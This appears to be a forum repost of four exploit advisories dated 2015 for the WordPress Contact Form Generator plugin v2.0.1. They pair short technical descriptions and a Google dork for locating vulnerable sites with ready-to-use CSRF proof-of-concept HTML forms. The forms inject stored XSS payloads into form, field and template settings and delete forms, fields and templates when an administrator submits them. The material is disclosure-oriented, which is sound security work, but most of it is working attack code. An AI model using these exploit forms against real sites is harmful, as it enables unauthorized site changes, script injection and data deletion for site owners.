[HTML] 纯文本查看 复制代码 <html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: [url]http://creative-solutions.net/[/url]
# plugin uri: [url]http://creative-solutions.net/wordpress/contact-form-generator/[/url]
# Software Link: [url]https://downloads.wordpress.org/plugin/contact-form-generator.zip[/url]
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img src=x>" />
<input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="column_type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: [url]http://creative-solutions.net/[/url]
# plugin uri: [url]http://creative-solutions.net/wordpress/contact-form-generator/[/url]
# Software Link: [url]https://downloads.wordpress.org/plugin/contact-form-generator.zip[/url]
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: [url]http://creative-solutions.net/[/url]
# plugin uri: [url]http://creative-solutions.net/wordpress/contact-form-generator/[/url]
# Software Link: [url]https://downloads.wordpress.org/plugin/contact-form-generator.zip[/url]
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa"><img src=x>" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value=""><img src=x>" />
<input type="hidden" name="styles[587]" value=""><img src=x>" />
<input type="hidden" name="styles[588]" value=""><img src=x>" />
<input type="hidden" name="styles[131]" value="inherit" />
<input type="hidden" name="styles[589]" value="1" />
<input type="hidden" name="styles[629]" value="dark-thin" />
<input type="hidden" name="styles[630]" value="dark-thin" />
<input type="hidden" name="styles[627]" value="0" />
<input type="hidden" name="styles[0]" value=""><img src=x>" />
<input type="hidden" name="styles[130]" value=""><img src=x>" />
<input type="hidden" name="styles[517]" value=""><img src=x>" />
<input type="hidden" name="styles[518]" value=""><img src=x>" />
<input type="hidden" name="styles[1]" value=""><img src=x>" />
<input type="hidden" name="styles[2]" value=""><img src=x>" />
<input type="hidden" name="styles[3]" value="solid" />
<input type="hidden" name="styles[4]" value=""><img src=x>" />
<input type="hidden" name="styles[5]" value=""><img src=x>" />
<input type="hidden" name="styles[6]" value=""><img src=x>" />
<input type="hidden" name="styles[7]" value=""><img src=x>" />
<input type="hidden" name="styles[8]" value=""><img src=x>" />
<input type="hidden" name="styles[9]" value=""><img src=x>" />
<input type="hidden" name="styles[10]" value=""><img src=x>" />
<input type="hidden" name="styles[11]" value=""><img src=x>" />
<input type="hidden" name="styles[12]" value=""><img src=x>" />
<input type="hidden" name="styles[13]" value=""><img src=x>" />
<input type="hidden" name="styles[14]" value=""><img src=x>" />
<input type="hidden" name="styles[15]" value=""><img src=x>" />
<input type="hidden" name="styles[16]" value=""><img src=x>" />
<input type="hidden" name="styles[17]" value=""><img src=x>" />
<input type="hidden" name="styles[18]" value=""><img src=x>" />
<input type="hidden" name="styles[19]" value=""><img src=x>" />
<input type="hidden" name="styles[600]" value="0" />
<input type="hidden" name="styles[601]" value=""><img src=x>" />
<input type="hidden" name="styles[602]" value=""><img src=x>" />
<input type="hidden" name="styles[603]" value=""><img src=x>" />
<input type="hidden" name="styles[604]" value=""><img src=x>" />
<input type="hidden" name="styles[605]" value=""><img src=x>" />
<input type="hidden" name="styles[606]" value=""><img src=x>" />
<input type="hidden" name="styles[607]" value=""><img src=x>" />
<input type="hidden" name="styles[608]" value="solid" />
<input type="hidden" name="styles[609]" value=""><img src=x>" />
<input type="hidden" name="styles[610]" value="0" />
<input type="hidden" name="styles[611]" value=""><img src=x>" />
<input type="hidden" name="styles[612]" value=""><img src=x>" />
<input type="hidden" name="styles[613]" value=""><img src=x>" />
<input type="hidden" name="styles[614]" value=""><img src=x>" />
<input type="hidden" name="styles[615]" value=""><img src=x>" />
<input type="hidden" name="styles[616]" value=""><img src=x>" />
<input type="hidden" name="styles[617]" value="0" />
<input type="hidden" name="styles[618]" value=""><img src=x>" />
<input type="hidden" name="styles[619]" value=""><img src=x>" />
<input type="hidden" name="styles[620]" value=""><img src=x>" />
<input type="hidden" name="styles[621]" value=""><img src=x>" />
<input type="hidden" name="styles[622]" value=""><img src=x>" />
<input type="hidden" name="styles[623]" value=""><img src=x>" />
<input type="hidden" name="styles[624]" value=""><img src=x>" />
<input type="hidden" name="styles[625]" value="solid" />
<input type="hidden" name="styles[626]" value=""><img src=x>" />
<input type="hidden" name="styles[20]" value=""><img src=x>" />
<input type="hidden" name="styles[21]" value=""><img src=x>" />
<input type="hidden" name="styles[22]" value="normal" />
<input type="hidden" name="styles[23]" value="normal" />
<input type="hidden" name="styles[24]" value="none" />
<input type="hidden" name="styles[25]" value="left" />
<input type="hidden" name="styles[506]" value="inherit" />
<input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[27]" value=""><img src=x>" />
<input type="hidden" name="styles[28]" value=""><img src=x>" />
<input type="hidden" name="styles[29]" value=""><img src=x>" />
<input type="hidden" name="styles[30]" value=""><img src=x>" />
<input type="hidden" name="styles[190]" value=""><img src=x>" />
<input type="hidden" name="styles[191]" value=""><img src=x>" />
<input type="hidden" name="styles[192]" value=""><img src=x>" />
<input type="hidden" name="styles[502]" value="left" />
<input type="hidden" name="styles[193]" value=""><img src=x>" />
<input type="hidden" name="styles[194]" value=""><img src=x>" />
<input type="hidden" name="styles[195]" value=""><img src=x>" />
<input type="hidden" name="styles[196]" value="solid" />
<input type="hidden" name="styles[197]" value=""><img src=x>" />
<input type="hidden" name="styles[198]" value=""><img src=x>" />
<input type="hidden" name="styles[199]" value="normal" />
<input type="hidden" name="styles[200]" value="normal" />
<input type="hidden" name="styles[201]" value="none" />
<input type="hidden" name="styles[202]" value="inherit" />
<input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[203]" value=""><img src=x>" />
<input type="hidden" name="styles[204]" value=""><img src=x>" />
<input type="hidden" name="styles[205]" value=""><img src=x>" />
<input type="hidden" name="styles[206]" value=""><img src=x>" />
<input type="hidden" name="styles[215]" value=""><img src=x>" />
<input type="hidden" name="styles[216]" value=""><img src=x>" />
<input type="hidden" name="styles[217]" value=""><img src=x>" />
<input type="hidden" name="styles[218]" value=""><img src=x>" />
<input type="hidden" name="styles[31]" value=""><img src=x>" />
<input type="hidden" name="styles[32]" value=""><img src=x>" />
<input type="hidden" name="styles[33]" value="normal" />
<input type="hidden" name="styles[34]" value="normal" />
<input type="hidden" name="styles[35]" value="none" />
<input type="hidden" name="styles[36]" value="left" />
<input type="hidden" name="styles[507]" value="inherit" />
<input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[37]" value=""><img src=x>" />
<input type="hidden" name="styles[38]" value=""><img src=x>" />
<input type="hidden" name="styles[39]" value=""><img src=x>" />
<input type="hidden" name="styles[40]" value=""><img src=x>" />
<input type="hidden" name="styles[41]" value=""><img src=x>" />
<input type="hidden" name="styles[42]" value=""><img src=x>" />
<input type="hidden" name="styles[43]" value="normal" />
<input type="hidden" name="styles[44]" value="normal" />
<input type="hidden" name="styles[509]" value="inherit" />
<input type="hidden" name="styles[46]" value=""><img src=x>" />
<input type="hidden" name="styles[47]" value=""><img src=x>" />
<input type="hidden" name="styles[48]" value=""><img src=x>" />
<input type="hidden" name="styles[49]" value=""><img src=x>" />
<input type="hidden" name="styles[505]" value="white" />
<input type="hidden" name="styles[508]" value="inherit" />
<input type="hidden" name="styles[132]" value=""><img src=x>" />
<input type="hidden" name="styles[133]" value=""><img src=x>" />
<input type="hidden" name="styles[168]" value=""><img src=x>" />
<input type="hidden" name="styles[519]" value=""><img src=x>" />
<input type="hidden" name="styles[520]" value=""><img src=x>" />
<input type="hidden" name="styles[500]" value="left" />
<input type="hidden" name="styles[501]" value="left" />
<input type="hidden" name="styles[134]" value=""><img src=x>" />
<input type="hidden" name="styles[135]" value=""><img src=x>" />
<input type="hidden" name="styles[136]" value="solid" />
<input type="hidden" name="styles[137]" value=""><img src=x>" />
<input type="hidden" name="styles[138]" value=""><img src=x>" />
<input type="hidden" name="styles[139]" value=""><img src=x>" />
<input type="hidden" name="styles[140]" value=""><img src=x>" />
<input type="hidden" name="styles[141]" value=""><img src=x>" />
<input type="hidden" name="styles[142]" value=""><img src=x>" />
<input type="hidden" name="styles[143]" value=""><img src=x>" />
<input type="hidden" name="styles[144]" value=""><img src=x>" />
<input type="hidden" name="styles[145]" value=""><img src=x>" />
<input type="hidden" name="styles[146]" value=""><img src=x>" />
<input type="hidden" name="styles[147]" value=""><img src=x>" />
<input type="hidden" name="styles[148]" value=""><img src=x>" />
<input type="hidden" name="styles[149]" value="normal" />
<input type="hidden" name="styles[150]" value="normal" />
<input type="hidden" name="styles[151]" value="none" />
<input type="hidden" name="styles[152]" value="inherit" />
<input type="hidden" name="styles[153]" value=""><img src=x>" />
<input type="hidden" name="styles[154]" value=""><img src=x>" />
<input type="hidden" name="styles[155]" value=""><img src=x>" />
<input type="hidden" name="styles[156]" value=""><img src=x>" />
<input type="hidden" name="styles[157]" value=""><img src=x>" />
<input type="hidden" name="styles[158]" value=""><img src=x>" />
<input type="hidden" name="styles[159]" value=""><img src=x>" />
<input type="hidden" name="styles[160]" value=""><img src=x>" />
<input type="hidden" name="styles[161]" value=""><img src=x>" />
<input type="hidden" name="styles[162]" value=""><img src=x>" />
<input type="hidden" name="styles[163]" value=""><img src=x>" />
<input type="hidden" name="styles[164]" value=""><img src=x>" />
<input type="hidden" name="styles[165]" value=""><img src=x>" />
<input type="hidden" name="styles[166]" value=""><img src=x>" />
<input type="hidden" name="styles[167]" value=""><img src=x>" />
<input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[176]" value=""><img src=x>" />
<input type="hidden" name="styles[177]" value=""><img src=x>" />
<input type="hidden" name="styles[178]" value=""><img src=x>" />
<input type="hidden" name="styles[179]" value=""><img src=x>" />
<input type="hidden" name="styles[180]" value=""><img src=x>" />
<input type="hidden" name="styles[181]" value=""><img src=x>" />
<input type="hidden" name="styles[182]" value=""><img src=x>" />
<input type="hidden" name="styles[183]" value=""><img src=x>" />
<input type="hidden" name="styles[184]" value=""><img src=x>" />
<input type="hidden" name="styles[185]" value=""><img src=x>" />
<input type="hidden" name="styles[186]" value=""><img src=x>" />
<input type="hidden" name="styles[187]" value=""><img src=x>" />
<input type="hidden" name="styles[188]" value=""><img src=x>" />
<input type="hidden" name="styles[189]" value=""><img src=x>" />
<input type="hidden" name="styles[171]" value=""><img src=x>" />
<input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[172]" value=""><img src=x>" />
<input type="hidden" name="styles[173]" value=""><img src=x>" />
<input type="hidden" name="styles[174]" value=""><img src=x>" />
<input type="hidden" name="styles[175]" value=""><img src=x>" />
<input type="hidden" name="styles[169]" value=""><img src=x>" />
<input type="hidden" name="styles[521]" value=""><img src=x>" />
<input type="hidden" name="styles[522]" value=""><img src=x>" />
<input type="hidden" name="styles[170]" value=""><img src=x>" />
<input type="hidden" name="styles[523]" value=""><img src=x>" />
<input type="hidden" name="styles[535]" value=""><img src=x>" />
<input type="hidden" name="styles[536]" value=""><img src=x>" />
<input type="hidden" name="styles[537]" value=""><img src=x>" />
<input type="hidden" name="styles[538]" value=""><img src=x>" />
<input type="hidden" name="styles[539]" value=""><img src=x>" />
<input type="hidden" name="styles[540]" value=""><img src=x>" />
<input type="hidden" name="styles[541]" value=""><img src=x>" />
<input type="hidden" name="styles[542]" value=""><img src=x>" />
<input type="hidden" name="styles[543]" value=""><img src=x>" />
<input type="hidden" name="styles[544]" value=""><img src=x>" />
<input type="hidden" name="styles[545]" value=""><img src=x>" />
<input type="hidden" name="styles[546]" value=""><img src=x>" />
<input type="hidden" name="styles[547]" value="solid" />
<input type="hidden" name="styles[548]" value=""><img src=x>" />
<input type="hidden" name="styles[549]" value=""><img src=x>" />
<input type="hidden" name="styles[550]" value=""><img src=x>" />
<input type="hidden" name="styles[551]" value=""><img src=x>" />
<input type="hidden" name="styles[524]" value=""><img src=x>" />
<input type="hidden" name="styles[525]" value=""><img src=x>" />
<input type="hidden" name="styles[526]" value="normal" />
<input type="hidden" name="styles[527]" value="normal" />
<input type="hidden" name="styles[528]" value="none" />
<input type="hidden" name="styles[529]" value="inherit" />
<input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[531]" value=""><img src=x>" />
<input type="hidden" name="styles[532]" value=""><img src=x>" />
<input type="hidden" name="styles[533]" value=""><img src=x>" />
<input type="hidden" name="styles[534]" value=""><img src=x>" />
<input type="hidden" name="styles[91]" value=""><img src=x>" />
<input type="hidden" name="styles[50]" value=""><img src=x>" />
<input type="hidden" name="styles[212]" value="left" />
<input type="hidden" name="styles[92]" value=""><img src=x>" />
<input type="hidden" name="styles[93]" value=""><img src=x>" />
<input type="hidden" name="styles[209]" value=""><img src=x>" />
<input type="hidden" name="styles[100]" value=""><img src=x>" />
<input type="hidden" name="styles[101]" value=""><img src=x>" />
<input type="hidden" name="styles[127]" value="solid" />
<input type="hidden" name="styles[102]" value=""><img src=x>" />
<input type="hidden" name="styles[103]" value=""><img src=x>" />
<input type="hidden" name="styles[104]" value=""><img src=x>" />
<input type="hidden" name="styles[105]" value=""><img src=x>" />
<input type="hidden" name="styles[94]" value=""><img src=x>" />
<input type="hidden" name="styles[95]" value=""><img src=x>" />
<input type="hidden" name="styles[96]" value=""><img src=x>" />
<input type="hidden" name="styles[97]" value=""><img src=x>" />
<input type="hidden" name="styles[98]" value=""><img src=x>" />
<input type="hidden" name="styles[99]" value=""><img src=x>" />
<input type="hidden" name="styles[106]" value=""><img src=x>" />
<input type="hidden" name="styles[107]" value=""><img src=x>" />
<input type="hidden" name="styles[108]" value="normal" />
<input type="hidden" name="styles[109]" value="normal" />
<input type="hidden" name="styles[110]" value="none" />
<input type="hidden" name="styles[112]" value="inherit" />
<input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[113]" value=""><img src=x>" />
<input type="hidden" name="styles[114]" value=""><img src=x>" />
<input type="hidden" name="styles[115]" value=""><img src=x>" />
<input type="hidden" name="styles[116]" value=""><img src=x>" />
<input type="hidden" name="styles[51]" value=""><img src=x>" />
<input type="hidden" name="styles[52]" value=""><img src=x>" />
<input type="hidden" name="styles[124]" value=""><img src=x>" />
<input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[125]" value=""><img src=x>" />
<input type="hidden" name="styles[126]" value=""><img src=x>" />
<input type="hidden" name="styles[117]" value=""><img src=x>" />
<input type="hidden" name="styles[118]" value=""><img src=x>" />
<input type="hidden" name="styles[119]" value=""><img src=x>" />
<input type="hidden" name="styles[120]" value=""><img src=x>" />
<input type="hidden" name="styles[121]" value=""><img src=x>" />
<input type="hidden" name="styles[122]" value=""><img src=x>" />
<input type="hidden" name="styles[552]" value="1" />
<input type="hidden" name="styles[553]" value=""><img src=x>" />
<input type="hidden" name="styles[554]" value=""><img src=x>" />
<input type="hidden" name="styles[555]" value="normal" />
<input type="hidden" name="styles[556]" value="normal" />
<input type="hidden" name="styles[596]" value="none" />
<input type="hidden" name="styles[590]" value=""><img src=x>" />
<input type="hidden" name="styles[591]" value="solid" />
<input type="hidden" name="styles[592]" value=""><img src=x>" />
<input type="hidden" name="styles[558]" value=""><img src=x>" />
<input type="hidden" name="styles[559]" value=""><img src=x>" />
<input type="hidden" name="styles[560]" value=""><img src=x>" />
<input type="hidden" name="styles[561]" value=""><img src=x>" />
<input type="hidden" name="styles[563]" value="1" />
<input type="hidden" name="styles[562]" value="1" />
<input type="hidden" name="styles[597]" value=""><img src=x>" />
<input type="hidden" name="styles[598]" value=""><img src=x>" />
<input type="hidden" name="styles[564]" value=""><img src=x>" />
<input type="hidden" name="styles[565]" value="normal" />
<input type="hidden" name="styles[566]" value="normal" />
<input type="hidden" name="styles[594]" value="none" />
<input type="hidden" name="styles[567]" value=""><img src=x>" />
<input type="hidden" name="styles[568]" value="solid" />
<input type="hidden" name="styles[569]" value=""><img src=x>" />
<input type="hidden" name="styles[570]" value=""><img src=x>" />
<input type="hidden" name="styles[571]" value=""><img src=x>" />
<input type="hidden" name="styles[572]" value=""><img src=x>" />
<input type="hidden" name="styles[573]" value=""><img src=x>" />
<input type="hidden" name="styles[574]" value=""><img src=x>" />
<input type="hidden" name="styles[595]" value="none" />
<input type="hidden" name="styles[575]" value=""><img src=x>" />
<input type="hidden" name="styles[576]" value=""><img src=x>" />
<input type="hidden" name="styles[577]" value=""><img src=x>" />
<input type="hidden" name="styles[578]" value=""><img src=x>" />
<input type="hidden" name="styles[579]" value=""><img src=x>" />
<input type="hidden" name="styles[580]" value=""><img src=x>" />
<input type="hidden" name="styles[581]" value="normal" />
<input type="hidden" name="styles[582]" value="normal" />
<input type="hidden" name="styles[593]" value="none" />
<input type="hidden" name="styles[583]" value=""><img src=x>" />
<input type="hidden" name="styles[584]" value=""><img src=x>" />
<input type="hidden" name="styles[585]" value=""><img src=x>" />
<input type="hidden" name="styles[586]" value=""><img src=x>" />
<input type="hidden" name="styles[599]" value=""><img src=x>" />
<input type="hidden" name="styles[628]" value=""><img src=x>" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: [url]http://creative-solutions.net/[/url]
# plugin uri: [url]http://creative-solutions.net/wordpress/contact-form-generator/[/url]
# Software Link: [url]https://downloads.wordpress.org/plugin/contact-form-generator.zip[/url]
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids[]" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter_form" value="3" />
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_type" value="0" />
<input type="hidden" name="filter_search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids[]" value="9" />
<input type="hidden" name="ids[]" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids[]" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-> |